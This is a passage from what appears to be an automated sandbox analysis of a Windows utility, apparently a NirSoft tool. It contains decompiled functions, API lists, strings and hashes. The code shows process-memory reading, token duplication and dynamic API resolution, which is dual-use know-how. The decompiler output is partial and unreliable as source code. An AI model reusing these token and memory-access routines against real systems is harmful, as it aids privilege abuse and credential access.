					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}

0x00409faf
0x00409fb4
0x00409fb5
0x00409fb6
0x0040a043
0x0040a04a
0x0040a058
0x0040a05f
0x0040a06d
0x0040a074
0x0040a08e
0x0040a099
0x0040a0ab
0x0040a0c9
0x0040a0ce
0x00000000
0x0040a0ce
0x00409fc3
0x00409fca
0x00409fd8
0x00409fdf
0x00409ff9
0x0040a006
0x0040a018
0x00000000

APIs

memset.MSVCRT ref: 00409FCA
memset.MSVCRT ref: 00409FDF
_snwprintf.MSVCRT ref: 00409FF9
_snwprintf.MSVCRT ref: 0040A018
memset.MSVCRT ref: 0040A04A
memset.MSVCRT ref: 0040A05F
memset.MSVCRT ref: 0040A074
_snwprintf.MSVCRT ref: 0040A08E
_snwprintf.MSVCRT ref: 0040A0AB

Strings

%%0.%df, xrefs: 00409FEC, 0040A081

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: %%0.%df
API String ID: 3473751417-763548558
Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}

0x00406216
0x0040621b
0x00406222
0x0040625f
0x00406263
0x00406269
0x00406271
0x00406273
0x00406289
0x00406289
0x0040628e
0x0040628f
0x004062a9
0x004062ab
0x004062ad
0x004062b0
0x004062c3
0x004062c3
0x004062d3
0x004062da
0x004062f1
0x004062f7
0x004062fe
0x0040630d
0x00406312
0x0040631e
0x00406327
0x00406275
0x00406283
0x00406283
0x00406285
0x00406287
0x00000000
0x00000000
0x00406277
0x0040627a
0x00406280
0x00406280
0x00000000
0x00406280
0x00000000
0x0040627a
0x00000000
0x00406283
0x00406273
0x00406224
0x00406224
0x00406229
0x0040622a
0x0040622f
0x00406236
0x0040623c
0x00406243
0x00406245
0x00406247
0x00406248
0x0040624b
0x00406254
0x00406254
0x0040632d
0x00406334

APIs

LoadMenuW.USER32 ref: 00406236

Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7

DestroyMenu.USER32(00000000), ref: 00406254
CreateDialogParamW.USER32 ref: 004062A9
GetDesktopWindow.USER32 ref: 004062B4
CreateDialogParamW.USER32 ref: 004062C1
memset.MSVCRT ref: 004062DA
GetWindowTextW.USER32 ref: 004062F1
EnumChildWindows.USER32 ref: 0040631E
DestroyWindow.USER32(00000005), ref: 00406327

Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2

Strings

caption, xrefs: 00406308

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
String ID: caption
API String ID: 973020956-4135340389
Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

0x004081e4
0x004081ec
0x004081fc
0x00408200
0x00408215
0x0040821c
0x0040822a
0x00408231
0x0040823f
0x00408246
0x0040824b
0x0040824e
0x0040825a
0x0040825c
0x00408261
0x0040826c
0x0040826d
0x0040826e
0x00408273
0x00408273
0x00408276
0x0040827c
0x0040828a
0x00408290
0x004082ab
0x004082c5
0x004082c6
0x004082d1
0x004082d2
0x004082d3
0x004082e7
0x004082ec
0x004082f0
0x00000000
0x004082f5
0x004082fe

APIs

memset.MSVCRT ref: 0040821C
memset.MSVCRT ref: 00408231
memset.MSVCRT ref: 00408246
_snwprintf.MSVCRT ref: 0040826E
wcscpy.MSVCRT ref: 0040828A
_snwprintf.MSVCRT ref: 004082D3

Strings

<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
<table dir="rtl"><tr><td>, xrefs: 00408284

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$wcscpy
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 1283228442-2366825230
Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}

0x0040920a
0x00409218
0x00409223
0x0040922c
0x0040924b
0x00409253
0x0040929b
0x004092e4
0x0040929d
0x004092a3
0x004092b1
0x004092bd
0x004092cc
0x004092d1
0x004092d8
0x004092dd
0x00409255
0x0040925b
0x00409269
0x00409275
0x00409282
0x0040928d
0x00409292
0x004092ec
0x004092ef
0x004092ef
0x00409231
0x00409232
0x00409233
0x00000000
0x00409239
0x0040921a
0x00000000

APIs

wcschr.MSVCRT ref: 00409223
wcscpy.MSVCRT ref: 00409233

Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1

wcscpy.MSVCRT ref: 00409282
wcscat.MSVCRT ref: 0040928D
memset.MSVCRT ref: 00409269

Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E

memset.MSVCRT ref: 004092B1
memcpy.MSVCRT ref: 004092CC
wcscat.MSVCRT ref: 004092D8

Strings

\systemroot, xrefs: 00409240

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
String ID: \systemroot
API String ID: 4173585201-1821301763
Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE

Uniqueness

Uniqueness Score: -1.00%

Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}

0x00409c73
0x00409c7c
0x00409c90
0x00409c9f
0x00409ca2
0x00409ca7
0x00409ca9
0x00409cb1
0x00409cc0
0x00409cc2
0x00409cc7
0x00409ccf
0x00409cd0
0x00409cd7
0x00409cd8
0x00409cd9
0x00409cda
0x00409cdc
0x00409ce0
0x00409ce1
0x00409ce9
0x00409cf1
0x00409cfb
0x00409d08
0x00409d08
0x00000000
0x00409d0d
0x00409d0f

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
strlen.MSVCRT ref: 00409CE4
strlen.MSVCRT ref: 00409CF1

Strings

kernel32.dll, xrefs: 00409C8B
GetProcAddress, xrefs: 00409C98, 00409C9D
LdrGetProcedureAddress, xrefs: 00409CBA
ntdll.dll, xrefs: 00409CB3

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcstrlen
String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
API String ID: 1027343248-2054640941
Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}

0x004028a3
0x004028ab
0x004028bd
0x004028ca
0x004028d7
0x004028e3
0x004028e6
0x004028e8
0x00000000
0x004028eb
0x004028ec

APIs

LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6

Strings

OpenProcessToken, xrefs: 004028CF
CreateProcessWithLogonW, xrefs: 004028B7
DuplicateTokenEx, xrefs: 004028DB
advapi32.dll, xrefs: 004028A6
CreateProcessWithTokenW, xrefs: 004028C2

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
API String ID: 2238633743-1970996977
Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t48;
				void* _t56;
				signed int _t57;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
						E004055D1(_t61,  &_v28);
					}
					E004055D1(CloseHandle(_a16),  &_v564);
				}
				return _t69;
			}

0x00401ac9
0x00401ad1
0x00401ae1
0x00401ae7
0x00401ae9
0x00401aec
0x00401c1b
0x00401af2
0x00401af2
0x00401af8
0x00401b0c
0x00401b1a
0x00401bfd
0x00401b20
0x00401b26
0x00401b2b
0x00401b36
0x00401b40
0x00401b43
0x00401b4a
0x00401b54
0x00401b55
0x00401b56
0x00401b57
0x00401b58
0x00401b63
0x00401b68
0x00401b69
0x00401b77
0x00401b7d
0x00401b82
0x00401b82
0x00401b88
0x00401b8b
0x00401b8e
0x00401b91
0x00401b98
0x00401b9b
0x00401ba0
0x00401ba5
0x00401baa
0x00401bac
0x00401bac
0x00401bb2
0x00401bb2
0x00401bbe
0x00401bc4
0x00401bc6
0x00401bc8
0x00401bc8
0x00401bd7
0x00401bee
0x00401bf0
0x00401bf0
0x00401c0e
0x00401c0e
0x00401c23

APIs

OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
memset.MSVCRT ref: 00401B4A
ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
_snwprintf.MSVCRT ref: 00401B69

Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA

GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15

Strings

%d %I64x, xrefs: 00401B58

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
String ID: %d %I64x
API String ID: 2567117392-2565891505
Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}

0x004045c2
0x004045d1
0x004045da
0x004045ef
0x004045f6
0x00404604
0x0040460b
0x00404610
0x00404616
0x00404617
0x00404618
0x00404628
0x00404629
0x0040462a
0x0040462f
0x00404630
0x00404631
0x0040463c
0x0040463d
0x0040463e
0x00404656
0x00404662
0x0040466b
0x0040466d
0x0040466e
0x00404674
0x00404679

APIs

memset.MSVCRT ref: 004045F6
memset.MSVCRT ref: 0040460B
_snwprintf.MSVCRT ref: 0040462A
_snwprintf.MSVCRT ref: 0040463E
RegDeleteKeyW.ADVAPI32(?,?), ref: 00404656
RegDeleteKeyW.ADVAPI32(?,?), ref: 00404662
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0002001F,?,?,00403904), ref: 0040466E

Strings

%s\shell\%s, xrefs: 00404631
%s\shell\%s\command, xrefs: 00404618

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Delete_snwprintfmemset$Close
String ID: %s\shell\%s$%s\shell\%s\command
API String ID: 1018939227-3575174989
Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED

Uniqueness

Uniqueness Score: -1.00%

Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
